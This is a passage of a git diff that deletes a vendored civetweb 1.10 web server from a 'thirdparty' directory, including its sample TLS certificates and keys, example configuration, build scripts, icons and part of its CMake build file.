-erhJaWg69b2Li4t5/JxElESR8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3Wh
-U3DYiFL2sJndrDvAhmso122ZxVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVk
-ki05XcwfbI2y6gqCRpOSXdE9gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0Kes
-oCwb4f5oqs2vThUmXKuxu8GOWpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNK
-BJVKPCETnYw+2ArMgXzs+JuAC4AhV0e6unLX9DcavZ6j7JcCAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQBvbql7sAA8XOwsszRUzOCLkFxfDsWJ0l5re2mGgHTEd5hc
-eDfM+Vdy8SVZX9OySdioVD6ACTse3rc1ULYn8jj1wvOd3/z/J9aUBcBACJG5D1Dl
-+j+xvfhvgAGCEQn7ZMaWLFWrLs++aQ+EKbl0SypEI2rTJkyZlYSDVpa+LhqX4UOa
-+RNlq1CX+85HCjBn0sWBNzhjrf3gwERRn5NfTab4FqwqGp2+s4GvbOJHrm8saMWu
-BlhcTzGGLBRKCQUHo5i9393b3oBOqtcpWPcZGhyAF1NUbYL7USnsiH6lkGReeaFi
-xy7vYmUn9j//vT64SmASG0oF+ecUF0q2W42sSqnU
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.key b/thirdparty/civetweb-1.10/resources/cert/server_bkup.key
deleted file mode 100644
index 235c83a..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEApMmvc/NY5HUeuN+T1sEDtOm0jWE1hWf9e+LYZJ96uElpaDr1
-vYuLi3n8nESURJHx/LSUEzND/JoWJBvnXLtDVz5nrFYvGTfbat/LdaFTcNiIUvaw
-md2sO8CGayjXbZnFUAMDRxDCjnbQyAVikc0EXwFwVXYhG6TNVf7+dWSSLTldzB9s
-jbLqCoJGk5Jd0T2AINVqfe1JFu2vAq7sgfLzyYvrTnujzZR7OmXQp6ygLBvh/miq
-za9OFSZcq7G7wY5alk0rgkVadOAM4mu5tm8rHPMv0TzkNL1pcuTp00oElUo8IROd
-jD7YCsyBfOz4m4ALgCFXR7q6ctf0Nxq9nqPslwIDAQABAoIBAE/B7lHIrnWk2kHQ
-tNV0hj7B/smPC0COnHmhyeqp5dPcdFAmeVpMeDYBzOo1py2pFd6h6CmC3p0cVysS
-9mBDosxPQA6BiDpEdsa7mtZMRv6PTywYilFuoTYqcOTc16gMjRu02ZlD22boyxSE
-xria6kqxf5Vdn5ipo1jEGpTnIHkSS+Y8CetCaYgcezLaXlXN3RyjF6tCHMeS3iLl
-/zY2O4avG2BM+vvDGDW2FWtZg+hN+5Yk90Qt8dFTwvWRCfYaSWfi7id91p5X0rnL
-x1G07qw18LziKJj4HZiueqbDcDOYhfcA6sd0OHcvtXfGIoeqkXxi54cIOReRhN2/
-7ib3iUECgYEA2DNH5aiwc5uqTAL9RHTnuuFwQe46onJwnBkho+xEvvdsp2Q2f7VR
-c5M17fL+Rb5gq0O4vzeegKiYpo8gKjFp3Duv9Gdc/TB9sLEEt4NQMD4shV7ihBwC
-Rjsflww45dt0mccFZp1ncDYKWHDFzdhO+WB828FPFh/5dl6S+v4Q9bUCgYEAwx+G
-XhheTMSqoKGVJ283+4bNZWUSE99wcAhx9J3FkJera030mh0OHoCn0myBjRjxOSY/
-eBH8/0YoLkGYvTdEU/tYiLIWJ/ehC0eweXiwDehb5meco6u9WCeYvyPMLErXbe3K
-BQVyfcFzva4eC3dZ7lzxmyVyKXVTYgY0Hf7biJsCgYBKHdJg/eJ3z36jDkdK55Tl
-cRFt2MCLHhZSvR7WNlIe8W1zORyhzUP+DhJn32yh9jDnpZC5JNUWoDWsq9ZIAKac
-1G1uqNytA6mjIBxQ2RhtYXMbybp3ta5l6zDaNFtxGTmw2hSU6BMk2bHUPdzhw2zX
-eudy4qM9H3sCxEs49k5UHQKBgDz7I0FRGFehtznQhg73AWYIsTSZK9cuI7O/z+2F
-SXNxE0/L40AvCHSb/NcUtkBkpS8ZNwjNhmY5hOE/+v5XwXEFwpumHKqNB7XAx/SO
-tWcDUYVmqFu2lsxwQ5qpE2xcT4u5n0OGeku3I/cJ7bXjrSWDwracM1uloVOnYK5n
-MjE1AoGAeM6Wrb0VXRq025+OEfoFis3P9S0REkkkabM9+VLRSWi63uxg2cyipxUg
-qJUThbUm1aSS1F+XWjG7vrDjWT/GQTYj9/CH3mZRflZgLUltVHEZesLwWqn15Gl/
-BDwaV6RN7F3BCSzgEfCutrfGJqxA0tx5TTcupOgwpZVakN+hm3c=
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem b/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem
deleted file mode 100644
index a409c14..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFKfFGF1i10TANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjI1MVoXDTI3MDkwMTE5MjI1MVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-AKTJr3PzWOR1Hrjfk9bBA7TptI1hNYVn/Xvi2GSferhJaWg69b2Li4t5/JxElESR
-8fy0lBMzQ/yaFiQb51y7Q1c+Z6xWLxk322rfy3WhU3DYiFL2sJndrDvAhmso122Z
-xVADA0cQwo520MgFYpHNBF8BcFV2IRukzVX+/nVkki05XcwfbI2y6gqCRpOSXdE9
-gCDVan3tSRbtrwKu7IHy88mL6057o82Uezpl0KesoCwb4f5oqs2vThUmXKuxu8GO
-WpZNK4JFWnTgDOJrubZvKxzzL9E85DS9aXLk6dNKBJVKPCETnYw+2ArMgXzs+JuA
-C4AhV0e6unLX9DcavZ6j7JcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAJJWqVuQs
-guFZG/LZPeeh1WtZr9S6R5BT4+b+PH2teVyGtClXV6KpwcLNEVWzY3qPtrFFPQI1
-uEg6cY8w1JOiCmj/IWKsiHd+IdsqsFVKL+Bmvthm3HSgA6p6ZiVCG4E67p8xwiJP
-p5EwtMM/7BdS/tHLUOe1OpNZ8XtHRVUNbzy/+JV0So7WLP9ksGb6COL/9MF0/qG4
-4XrrvpZ9FAgRC9/22QyYiQqoaegGEy4E+KHOBxRmipInsU2H8aQA2sZzQ49Zew9E
-QI2jSJTC7EeuZ0OcZawKkJY1ZtIGmOo/Q956keOLdG8cxyq6pXW3gmq1X5QBxy1M
-pZYi5eIENGE63g==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEApMmvc/NY5HUeuN+T1sEDtOm0jWE1hWf9e+LYZJ96uElpaDr1
-vYuLi3n8nESURJHx/LSUEzND/JoWJBvnXLtDVz5nrFYvGTfbat/LdaFTcNiIUvaw
-md2sO8CGayjXbZnFUAMDRxDCjnbQyAVikc0EXwFwVXYhG6TNVf7+dWSSLTldzB9s
-jbLqCoJGk5Jd0T2AINVqfe1JFu2vAq7sgfLzyYvrTnujzZR7OmXQp6ygLBvh/miq
-za9OFSZcq7G7wY5alk0rgkVadOAM4mu5tm8rHPMv0TzkNL1pcuTp00oElUo8IROd
-jD7YCsyBfOz4m4ALgCFXR7q6ctf0Nxq9nqPslwIDAQABAoIBAE/B7lHIrnWk2kHQ
-tNV0hj7B/smPC0COnHmhyeqp5dPcdFAmeVpMeDYBzOo1py2pFd6h6CmC3p0cVysS
-9mBDosxPQA6BiDpEdsa7mtZMRv6PTywYilFuoTYqcOTc16gMjRu02ZlD22boyxSE
-xria6kqxf5Vdn5ipo1jEGpTnIHkSS+Y8CetCaYgcezLaXlXN3RyjF6tCHMeS3iLl
-/zY2O4avG2BM+vvDGDW2FWtZg+hN+5Yk90Qt8dFTwvWRCfYaSWfi7id91p5X0rnL
-x1G07qw18LziKJj4HZiueqbDcDOYhfcA6sd0OHcvtXfGIoeqkXxi54cIOReRhN2/
-7ib3iUECgYEA2DNH5aiwc5uqTAL9RHTnuuFwQe46onJwnBkho+xEvvdsp2Q2f7VR
-c5M17fL+Rb5gq0O4vzeegKiYpo8gKjFp3Duv9Gdc/TB9sLEEt4NQMD4shV7ihBwC
-Rjsflww45dt0mccFZp1ncDYKWHDFzdhO+WB828FPFh/5dl6S+v4Q9bUCgYEAwx+G
-XhheTMSqoKGVJ283+4bNZWUSE99wcAhx9J3FkJera030mh0OHoCn0myBjRjxOSY/
-eBH8/0YoLkGYvTdEU/tYiLIWJ/ehC0eweXiwDehb5meco6u9WCeYvyPMLErXbe3K
-BQVyfcFzva4eC3dZ7lzxmyVyKXVTYgY0Hf7biJsCgYBKHdJg/eJ3z36jDkdK55Tl
-cRFt2MCLHhZSvR7WNlIe8W1zORyhzUP+DhJn32yh9jDnpZC5JNUWoDWsq9ZIAKac
-1G1uqNytA6mjIBxQ2RhtYXMbybp3ta5l6zDaNFtxGTmw2hSU6BMk2bHUPdzhw2zX
-eudy4qM9H3sCxEs49k5UHQKBgDz7I0FRGFehtznQhg73AWYIsTSZK9cuI7O/z+2F
-SXNxE0/L40AvCHSb/NcUtkBkpS8ZNwjNhmY5hOE/+v5XwXEFwpumHKqNB7XAx/SO
-tWcDUYVmqFu2lsxwQ5qpE2xcT4u5n0OGeku3I/cJ7bXjrSWDwracM1uloVOnYK5n
-MjE1AoGAeM6Wrb0VXRq025+OEfoFis3P9S0REkkkabM9+VLRSWi63uxg2cyipxUg
-qJUThbUm1aSS1F+XWjG7vrDjWT/GQTYj9/CH3mZRflZgLUltVHEZesLwWqn15Gl/
-BDwaV6RN7F3BCSzgEfCutrfGJqxA0tx5TTcupOgwpZVakN+hm3c=
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin b/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin
deleted file mode 100644
index 0e05612..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server_bkup.pin
+++ /dev/null
@@ -1 +0,0 @@
-pf3px1MBPmlTGAPoiHWqaSJ9L9Z+DKfwgsU7LfLnmsk=
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.conf b/thirdparty/civetweb-1.10/resources/civetweb.conf
deleted file mode 100644
index 00aacde..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.conf
+++ /dev/null
@@ -1,32 +0,0 @@
-# Civetweb web server configuration file.
-# For detailed description of every option, visit
-# https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md
-# Lines starting with '#' and empty lines are ignored.
-# To make a change, remove leading '#', modify option's value,
-# save this file and then restart Civetweb.
-
-document_root .
-listening_ports 8080
-
-# cgi_pattern **.cgi$|**.pl$|**.php$
-# cgi_environment 
-# put_delete_auth_file 
-# cgi_interpreter 
-# protect_uri 
-# authentication_domain mydomain.com
-# ssi_pattern **.shtml$|**.shtm$
-# throttle 
-# access_log_file 
-# enable_directory_listing yes
-# error_log_file 
-# global_auth_file 
-# index_files index.html,index.htm,index.cgi,index.shtml,index.php,index.lp
-# enable_keep_alive no
-# access_control_list 
-# extra_mime_types 
-# ssl_certificate 
-# num_threads 50
-# run_as_user 
-# url_rewrite_patterns 
-# hide_files_patterns 
-# request_timeout_ms 30000
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.icns b/thirdparty/civetweb-1.10/resources/civetweb.icns
deleted file mode 100644
index af1f121..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.icns
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb.psd b/thirdparty/civetweb-1.10/resources/civetweb.psd
deleted file mode 100644
index accbe31..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb.psd
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_16x16.png b/thirdparty/civetweb-1.10/resources/civetweb_16x16.png
deleted file mode 100644
index 10ea1d2..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_16x16.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png b/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png
deleted file mode 100644
index 7621fb1..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_16x16@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_22x22.png b/thirdparty/civetweb-1.10/resources/civetweb_22x22.png
deleted file mode 100644
index f0b9094..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_22x22.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png b/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png
deleted file mode 100644
index bdb3614..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_22x22@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_32x32.png b/thirdparty/civetweb-1.10/resources/civetweb_32x32.png
deleted file mode 100644
index 62471e3..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_32x32.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png b/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png
deleted file mode 100644
index e192a45..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_32x32@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_64x64.png b/thirdparty/civetweb-1.10/resources/civetweb_64x64.png
deleted file mode 100644
index bc8b995..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_64x64.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png b/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png
deleted file mode 100644
index d6ad7b4..0000000
--- a/thirdparty/civetweb-1.10/resources/civetweb_64x64@2.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/coverity_check.sh b/thirdparty/civetweb-1.10/resources/coverity_check.sh
deleted file mode 100755
index 063d7c8..0000000
--- a/thirdparty/civetweb-1.10/resources/coverity_check.sh
+++ /dev/null
@@ -1,60 +0,0 @@
-#! /bin/sh
-
-# check if we use the correct directory
-ls src/civetweb.c
-if [ "$?" = "0" ]; then
-	echo "Building files for coverity check ..."
-else
-	echo "Run this script from the root directory of project!" 1>&2
-	echo "username@hostname:/somewhere/civetweb$ ./resources/coverity_check.sh" 1>&2
-	exit 1
-fi
-
-# remove last build
-rm -rf cov_build/
-
-# copy files to build folder
-mkdir cov_build
-mkdir cov_build/src
-mkdir cov_build/include
-mkdir cov_build/resources
-
-cp Makefile cov_build/
-cp src/*.c cov_build/src/
-cp src/*.inl cov_build/src/
-cp include/civetweb.h cov_build/include/
-cp resources/Makefile.in-os cov_build/resources/
-
-cd cov_build
-
-# new scan build
-../../cov-analysis-linux64-8.7.0/bin/cov-build  --dir cov-int make WITH_IPV6=1 WITH_WEBSOCKET=1 WITH_SERVER_STATS=1
-
-
-# pack build results for upload
-tar czvf civetweb_coverity_check.tgz cov-int
-
-cd ..
-
-# check if the build was successful
-echo
-ls -la cov_build/civetweb_coverity_check.tgz
-
-if [ "$?" = "0" ]; then
-	echo "... done"
-	echo
-        echo "submit to https://scan.coverity.com/projects/bel2125-civetweb"
-	echo
-	echo "last commit was"
-	git log -n 1
-        echo
-        echo
-else
-	echo "No civetweb_coverity_check.tgz file" 1>&2
-        echo
-	exit 1
-fi
-
-# return "ok"
-exit 0
-
diff --git a/thirdparty/civetweb-1.10/resources/duktape-logo.png b/thirdparty/civetweb-1.10/resources/duktape-logo.png
deleted file mode 100644
index afdc0f8..0000000
--- a/thirdparty/civetweb-1.10/resources/duktape-logo.png
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/itworks.html b/thirdparty/civetweb-1.10/resources/itworks.html
deleted file mode 100644
index cba3bad..0000000
--- a/thirdparty/civetweb-1.10/resources/itworks.html
+++ /dev/null
@@ -1,23 +0,0 @@
-<html>
-<head>
-<title>Civetweb: It Works!</title>
-</head>
-<body>
-<div style="float:right; width:100%; text-align:center;">
-</div>
-<div style="float:left; height:50%; margin-bottom:-200px;"></div>
-<div style="clear:both; height:400px; width:400px; margin: auto; position:relative;">
-<img src="civetweb_64x64.png" alt="logo"/>
-<p>
-<b style="font-size:larger"><a style="text-decoration:none" href="https://sourceforge.net/projects/civetweb/">Civetweb</a></b><br>
-<i>Your web server</i>
-<ul>
-<li><a href="https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md">User Manual</a></li>
-<li><a href="https://github.com/civetweb/civetweb/blob/master/RELEASE_NOTES.md">Release Notes</a></li>
-<li><a href="https://sourceforge.net/projects/civetweb/">Downloads</a></li>
-<li><a href="https://github.com/civetweb/civetweb">GitHub</a></li>
-</ul>
-</p>
-</div>
-</body>
-</html>
diff --git a/thirdparty/civetweb-1.10/resources/jni/Android.mk b/thirdparty/civetweb-1.10/resources/jni/Android.mk
deleted file mode 100644
index f24981a..0000000
--- a/thirdparty/civetweb-1.10/resources/jni/Android.mk
+++ /dev/null
@@ -1,6 +0,0 @@
-LOCAL_PATH := $(call my-dir)/../..
-include $(CLEAR_VARS)
-LOCAL_CFLAGS    := -std=c99 -O2 -W -Wall -pthread -pipe $(COPT)
-LOCAL_MODULE    := civetweb
-LOCAL_SRC_FILES := src\main.c src\civetweb.c
-include $(BUILD_EXECUTABLE)
diff --git a/thirdparty/civetweb-1.10/resources/lua-logo.jpg b/thirdparty/civetweb-1.10/resources/lua-logo.jpg
deleted file mode 100644
index 67de666..0000000
--- a/thirdparty/civetweb-1.10/resources/lua-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg b/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg
deleted file mode 100644
index 4a2e855..0000000
--- a/thirdparty/civetweb-1.10/resources/luafilesystem-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg b/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg
deleted file mode 100644
index 9388126..0000000
--- a/thirdparty/civetweb-1.10/resources/luasqlite-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg b/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg
deleted file mode 100644
index 9916f6e..0000000
--- a/thirdparty/civetweb-1.10/resources/luaxml-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/mingw.bat b/thirdparty/civetweb-1.10/resources/mingw.bat
deleted file mode 100644
index 8703266..0000000
--- a/thirdparty/civetweb-1.10/resources/mingw.bat
+++ /dev/null
@@ -1,15 +0,0 @@
-@rem MinGW build test - used to test MinGW builds locally

-@rem Adapt path/versions before use

-

-@rem This batch file must be used from the repository root

-@if exist mingw.bat cd ..

-

-

-@set PATH=%ProgramFiles%\mingw-w64\i686-4.9.2-win32-dwarf-rt_v3-rev1\mingw32\bin;%PATH%

-@set PATH=%ProgramFiles%\GnuWin32\bin;%PATH%

-

-@rem Alternative ways to use mingw

-@rem make CC=gcc CFLAGS=-w CFLAGS+=-Iinclude/ CFLAGS+=-lws2_32 CFLAGS+=-liphlpapi

-@rem gcc src\civetweb.c src\main.c -Iinclude\ -lws2_32 -lpthread -lcomdlg32 -w

-

-make build CC=gcc WITH_LUA=1 WITH_WEBSOCKET=1

diff --git a/thirdparty/civetweb-1.10/resources/res.rc b/thirdparty/civetweb-1.10/resources/res.rc
deleted file mode 100644
index 38a80bb..0000000
--- a/thirdparty/civetweb-1.10/resources/res.rc
+++ /dev/null
@@ -1 +0,0 @@
-100 ICON DISCARDABLE "systray.ico"
diff --git a/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg b/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg
deleted file mode 100644
index 14b01df..0000000
--- a/thirdparty/civetweb-1.10/resources/sqlite3-logo.jpg
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/resources/ssl_cert.pem b/thirdparty/civetweb-1.10/resources/ssl_cert.pem
deleted file mode 100644
index f7e15a0..0000000
--- a/thirdparty/civetweb-1.10/resources/ssl_cert.pem
+++ /dev/null
@@ -1,50 +0,0 @@
------BEGIN RSA PRIVATE KEY-----

-MIIEogIBAAKCAQEAwONaLOP7EdegqjRuQKSDXzvHmFMZfBufjhELhNjo5KsL4ieH

-hMSGCcSV6y32hzhqR5lvTViaQez+xhc58NZRu+OUgEhodRBW/vAOjpz/xdMz5HaC

-EhP3E9W1pkitVseS8B5rrgJo1BfCGai1fPav1nutPq2Kj7vMy24+g460Lonf6ln1

-di4aTIRtAqXtUU6RFpPJP35PkCXbTK65O8HJSxxt/XtfoezHCU5+UIwmZGYx46UB

-Wzg3IfK6bGPSiHU3pdiTol0uMPt/GUK+x4NyZJ4/ImsNAicRwMBdja4ywHKXJehH

-gXBthsVIHbL21x+4ibsg9eVM/XioTV6tW3IrdwIDAQABAoIBACFfdLutmkQFBcRN

-HAJNNHmmsyr0vcUOVnXTFyYeDXV67qxrYHQlOHe6LqIpKq1Mon7O2kYMnWvooFAP

-trOnsS6L+qaTYJdYg2TKjgo4ubw1hZXytyB/mdExuaMSkgMgtpia+tB5lD+V+LxN

-x1DesZ+veFMO3Zluyckswt4qM5yVa04YFrt31H0E1rJfIen61lidXIKYmHHWuRxK

-SadjFfbcqJ6P9ZF22BOkleg5Fm5NaxJmyQynOWaAkSZa5w1XySFfRjRfsbDr64G6

-+LSG8YtRuvfxnvUNhynVPHcpE40eiPo6v8Ho6yZKXpV5klCKciodXAORsswSoGJa

-N3nnu/ECgYEA6Yb2rM3QUEPIALdL8f/OzZ1GBSdiQB2WSAxzl9pR/dLF2H+0pitS

-to0830mk92ppVmRVD3JGxYDRZQ56tlFXyGaCzJBMRIcsotAhBoNbjV0i9n5bLJYf

-BmjU9yvWcgsTt0tr3B0FrtYyp2tCvwHqlxvFpFdUCj2oRw2uGpkhmNkCgYEA03M6

-WxFhsix3y6eVCVvShfbLBSOqp8l0qiTEty+dgVQcWN4CO/5eyaZXKxlCG9KMmKxy

-Yx+YgxZrDhfaZ0cxhHGPRKEAxM3IKwT2C8/wCaSiLWXZZpTifnSD99vtOt4wEfrG

-+AghNd5kamFiM9tU0AyvhJc2vdJFuXrfeC7ntM8CgYBGDA+t4cZcbRhu7ow/OKYF

-kulP3nJgHP/Y+LMrl3cEldZ2jEfZmCElVNQvfd2XwTl7injhOzvzPiKRF3jDez7D

-g8w0JAxceddvttJRK9GoY4l7OoeKpjUELSnEQkf+yUfOsTbXPXVY7jMfeNL6jE6b

-qN7t3qv8rmXtejMBE3G6cQKBgGR5W2BMiRSlxqKx1cKlrApV87BUe1HRCyuR3xuA

-d6Item7Lx1oEi7vb242yKdSYnpApWQ06xTh83Y/Ly87JaIEbiM0+h+P8OEIg0F1a

-iB+86AcUX1I8KseVy+Np0HbpfwP8GrFfA5DaRPK7pXMopEtby8cAJ1XZZaI1/ZvZ

-BebHAoGAcQU9WvCkT+nIp9FpXfBybYUsvgkaizMIqp66/l3GYgYAq8p1VLGvN4v5

-ec0dW58SJrCpqsM3NP78DtEzQf9OOsk+FsjBFzDU2RkeUreyt2/nQBj/2mN/+hEy

-hYN0Zii2yTb63jGxKY6gH1R/r9dL8kXaJmcZrfSa3AgywnteJWg=

------END RSA PRIVATE KEY-----

------BEGIN CERTIFICATE-----

-MIIDBjCCAe4CCQCX05m0b053QzANBgkqhkiG9w0BAQQFADBFMQswCQYDVQQGEwJB

-VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0

-cyBQdHkgTHRkMB4XDTA4MTIwNzEwMjUyMloXDTE4MTIwNTEwMjUyMlowRTELMAkG

-A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0

-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB

-AMDjWizj+xHXoKo0bkCkg187x5hTGXwbn44RC4TY6OSrC+Inh4TEhgnElest9oc4

-akeZb01YmkHs/sYXOfDWUbvjlIBIaHUQVv7wDo6c/8XTM+R2ghIT9xPVtaZIrVbH

-kvAea64CaNQXwhmotXz2r9Z7rT6tio+7zMtuPoOOtC6J3+pZ9XYuGkyEbQKl7VFO

-kRaTyT9+T5Al20yuuTvByUscbf17X6HsxwlOflCMJmRmMeOlAVs4NyHyumxj0oh1

-N6XYk6JdLjD7fxlCvseDcmSePyJrDQInEcDAXY2uMsBylyXoR4FwbYbFSB2y9tcf

-uIm7IPXlTP14qE1erVtyK3cCAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAW4yZdqpB

-oIdiuXRosr86Sg9FiMg/cn+2OwQ0QIaA8ZBwKsc+wIIHEgXCS8J6316BGQeUvMD+

-plNe0r4GWzzmlDMdobeQ5arPRB89qd9skE6pAMdLg3FyyfEjz3A0VpskolW5VBMr

-P5R7uJ1FLgH12RyAjZCWYcCRqEMOffqvyMCH6oAjyDmQOA5IssRKX/HsHntSH/HW

-W7slTcP45ty1b44Nq22/ubYk0CJRQgqKOIQ3cLgPomN1jNFQbAbfVTaK1DpEysrQ

-5V8a8gNW+3sVZmV6d1Mj3pN2Le62wUKuV2g6BNU7iiwcoY8HI68aRxz2hVMS+t5f

-SEGI4JSxV56lYg==

------END CERTIFICATE-----

------BEGIN DH PARAMETERS-----

-MEYCQQD+ef8hZ4XbdoyIpJyCTF2UrUEfX6mYDvxuS5O1UNYcslUqlj6JkA11e/yS

-6DK8Z86W6mSj5CEk4IjbyEOECXH7AgEC

------END DH PARAMETERS-----

diff --git a/thirdparty/civetweb-1.10/resources/systray.ico b/thirdparty/civetweb-1.10/resources/systray.ico
deleted file mode 100644
index 380c0ee..0000000
--- a/thirdparty/civetweb-1.10/resources/systray.ico
+++ /dev/null
Binary files differ
diff --git a/thirdparty/civetweb-1.10/src/CMakeLists.txt b/thirdparty/civetweb-1.10/src/CMakeLists.txt
deleted file mode 100644
index f01f66c..0000000
--- a/thirdparty/civetweb-1.10/src/CMakeLists.txt
+++ /dev/null
@@ -1,306 +0,0 @@
-# The C API library
-add_library(c-library civetweb.c)
-set_target_properties(c-library PROPERTIES
-  OUTPUT_NAME "civetweb"
-  VERSION ${CIVETWEB_VERSION}
-  SOVERSION ${CIVETWEB_VERSION}
-)
-
-set_property(TARGET c-library PROPERTY POSITION_INDEPENDENT_CODE ON)
-
-if (BUILD_SHARED_LIBS)
-if (APPLE)
-  target_compile_definitions(c-library PRIVATE CIVETWEB_DLL_EXPORTS)
- endif()
-endif()
-target_include_directories(
-  c-library PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-install(
-  TARGETS c-library
-  ARCHIVE DESTINATION lib
-  LIBRARY DESTINATION lib
-  RUNTIME DESTINATION bin
-  COMPONENT c-library)
-install(FILES
-  ${PROJECT_SOURCE_DIR}/include/civetweb.h
-  DESTINATION include
-  COMPONENT c-library)
-
-# Need Windows sockets if available
-find_package(WinSock)
-if (WINSOCK_FOUND)
-  target_link_libraries(c-library WINSOCK::WINSOCK)
-endif()
-
-# We need threading
-find_package(Threads)
-target_link_libraries(c-library ${CMAKE_THREAD_LIBS_INIT})
-
-# Need the realtime library if we're using timers
-find_package(LibRt)
-if (CIVETWEB_ENABLE_WEBSOCKETS AND CIVETWEB_ENABLE_LUA AND LIBRT_FOUND)
-  target_link_libraries(c-library LIBRT::LIBRT)
-endif()
-
-# We need to link OpenSSL if not dynamically loading
-if (CIVETWEB_ENABLE_SSL)
-  if (CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING)
-    find_package(LibDl)
-    if (LIBDL_FOUND)
-      target_link_libraries(c-library -ldl)
-    endif()
-  else()
-    find_package(OpenSSL)
-    include_directories(${OPENSSL_INCLUDE_DIR})
-    message(STATUS "OpenSSL include directory: ${OPENSSL_INCLUDE_DIR}")
-    target_link_libraries(c-library ${OPENSSL_LIBRARIES})
-  endif()
-endif()
-
-# If Lua support is needed we build some extra Lua libraries
-if (CIVETWEB_ENABLE_LUA)
-  include(ExternalProject)
-
-  # Determine if we should print to the output
-  if (CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT)
-    set(THIRD_PARTY_LOGGING 0)
-  else()
-    set(THIRD_PARTY_LOGGING 1)
-  endif()
-
-  # If Lua is static we must build it from source
-  if (NOT CIVETWEB_ENABLE_LUA_SHARED)
-    if (LINUX)
-      set(LUA_MAKE_TARGET linux)
-    elseif(DARWIN)
-      set(LUA_MAKE_TARGET macosx)
-    elseif(FREEBSD)
-      set(LUA_MAKE_TARGET freebsd)
-    elseif(WINDOWS)
-      set(LUA_MAKE_TARGET mingw)
-    elseif(UNIX)
-      set(LUA_MAKE_TARGET posix)
-    else()
-      set(LUA_MAKE_TARGET generic)
-    endif()
-    set(LUA_BUILD_COMMAND "${CMAKE_MAKE_PROGRAM};${LUA_MAKE_TARGET}")
